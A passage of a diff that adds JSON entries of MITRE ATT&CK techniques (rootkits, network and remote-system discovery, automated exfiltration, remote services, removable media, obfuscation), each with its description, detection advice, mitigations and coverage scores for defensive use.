Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Access" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.7751548486019046, + "adjusted_score": 0.7751548486019046, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1014", + "name": "Rootkit", + "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)", + "url": "https://attack.mitre.org/techniques/T1014", + "tactics": [ + "Defense Evasion" + ], + "detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Drive: Drive Modification", + "Firmware: Firmware Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.1674112363104762, + "adjusted_score": 0.1674112363104762, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1016", + "name": "System Network Configuration Discovery", + "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ", + "url": "https://attack.mitre.org/techniques/T1016", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1016.001", + "name": "System Network Configuration Discovery: Internet Connection Discovery", + "url": "https://attack.mitre.org/techniques/T1016/001", + "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.", + "mitigations": [] + } + ], + "mitigations": [], + "cumulative_score": 0.2461503297009524, + "adjusted_score": 0.2461503297009524, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1018", + "name": "Remote System Discovery", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\\Windows\\System32\\Drivers\\etc\\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. \n", + "url": "https://attack.mitre.org/techniques/T1018", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Network Traffic: Network Connection Creation", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.47890585659809526, + "adjusted_score": 0.47890585659809526, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1020", + "name": "Automated Exfiltration", + "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).", + "url": "https://attack.mitre.org/techniques/T1020", + "tactics": [ + "Exfiltration" + ], + "detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.", + "platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "Script: Script Execution" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1020.001", + "name": "Automated Exfiltration: Traffic Duplication", + "url": "https://attack.mitre.org/techniques/T1020/001", + "description": "Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)\n\nAdversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.", + "detection": "Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals). Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. ", + "mitigations": [ + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + } + ] + } + ], + "mitigations": [], + "cumulative_score": 0.2508228931057143, + "adjusted_score": 0.2508228931057143, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1021", + "name": "Remote Services", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)\n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)", + "url": "https://attack.mitre.org/techniques/T1021", + "tactics": [ + "Lateral Movement" + ], + "detection": "Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. \n\nUse of applications such as ARD may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. \n\nIn macOS, you can review logs for \"screensharingd\" and \"Authentication\" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Logon Session: Logon Session Creation", + "Module: Module Load", + "Network Share: Network Share Access", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Flow", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1021.001", + "name": "Remote Services: Remote Desktop Protocol", + "url": "https://attack.mitre.org/techniques/T1021/001", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware)", + "detection": "Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1021.002", + "name": "Remote Services: SMB/Windows Admin Shares", + "url": "https://attack.mitre.org/techniques/T1021/002", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.\n\nSMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.\n\nWindows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)", + "detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne)(Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting WMI Persistence)", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1021.003", + "name": "Remote Services: Distributed Component Object Model", + "url": "https://attack.mitre.org/techniques/T1021/003", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.\n\nThe Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)\n\nThrough DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)", + "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017) Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.\n\nMonitor for any influxes or abnormal increases in DCOM related Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic (typically over port 135).", + "mitigations": [ + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1021.004", + "name": "Remote Services: SSH", + "url": "https://attack.mitre.org/techniques/T1021/004", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.\n\nSSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user’s public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user.", + "detection": "Use of SSH may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nOn macOS systems log show --predicate 'process = \"sshd\"' can be used to review incoming SSH connection attempts for suspicious activity. The command log show --info --predicate 'process = \"ssh\" or eventMessage contains \"ssh\"' can be used to review outgoing SSH connection activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nOn Linux systems SSH activity can be found in the logs located in /var/log/auth.log or /var/log/secure depending on the distro you are using.", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1021.005", + "name": "Remote Services: VNC", + "url": "https://attack.mitre.org/techniques/T1021/005", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)", + "detection": "Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\n\nOn macOS systems log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1033", + "name": "Limit Software Installation", + "description": "Block users or groups from installing unapproved software.", + "url": "https://attack.mitre.org/mitigations/M1033" + } + ] + }, + { + "tid": "T1021.006", + "name": "Remote Services: Windows Remote Management", + "url": "https://attack.mitre.org/techniques/T1021/006", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)", + "detection": "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 2.5380348099076193, + "adjusted_score": 2.5380348099076193, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.7,5.3,6.1,6.2,6.4,6.5,6.8" + ], + "nist_controls": [ + "AC-17", + "AC-2", + "AC-20", + "AC-3", + "AC-5", + "AC-6", + "AC-7", + "CM-5", + "CM-6", + "IA-2", + "IA-5", + "SI-4" + ], + "process_coverage": true, + "network_coverage": true, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1025", + "name": "Data from Removable Media", + "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.", + "url": "https://attack.mitre.org/techniques/T1025", + "tactics": [ + "Collection" + ], + "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1057", + "name": "Data Loss Prevention", + "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)", + "url": "https://attack.mitre.org/mitigations/M1057" + } + ], + "cumulative_score": 0.3390285714285714, + "adjusted_score": 0.3390285714285714, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [ + "AC-16", + "AC-2", + "AC-23", + "AC-3", + "AC-6", + "CM-12", + "CP-9", + "MP-7", + "SA-8", + "SC-13", + "SC-28", + "SC-38", + "SC-41", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1027", + "name": "Obfuscated Files or Information", + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting 